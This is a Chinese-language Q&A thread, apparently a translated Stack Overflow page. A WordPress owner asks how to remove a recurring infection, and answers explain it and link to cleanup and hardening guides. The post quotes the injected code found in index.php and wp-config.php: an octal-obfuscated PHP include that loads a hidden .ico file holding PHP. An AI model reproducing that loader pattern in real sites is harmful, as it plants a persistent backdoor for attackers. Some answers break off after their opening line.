我的wordpress网站似乎已被黑客入侵。以下代码段位于index.php,wp-config.php
<?php
/*6b9bb*/
@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
我已更改:
但是,代码再次重复。有什么好的解决方案?
p.s。我正在使用Siteground。
谢谢
答案 0 :(得分:2)
是的,有人包含一个.ico文件(使用文本编辑器打开它,您会看到它是一些php代码,没有真正的ico文件)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
尽管您更改了主机名和密码,但是黑客仍然可以进入,一旦它们进入,他们可以设置各种后门以保持访问,但是他们的任何.php文件都可以做到这一点。 目前,关闭他们使用的最初的前门是您的唯一职业。
遵循本文中的建议: https://codex.wordpress.org/FAQ_My_site_was_hacked 然后:https://codex.wordpress.org/Hardening_WordPress
以下是有关后门的一些链接: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/
来源:https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
答案 1 :(得分:0)
我认为,一旦该网站遭到黑客入侵,抵制是徒劳的。没有任何扫描或工具可以帮助您。您将不得不用新的下载替换所有文件。大多是直接的:
答案 2 :(得分:0)
我也遇到了这个问题,我一步一步做了以下步骤: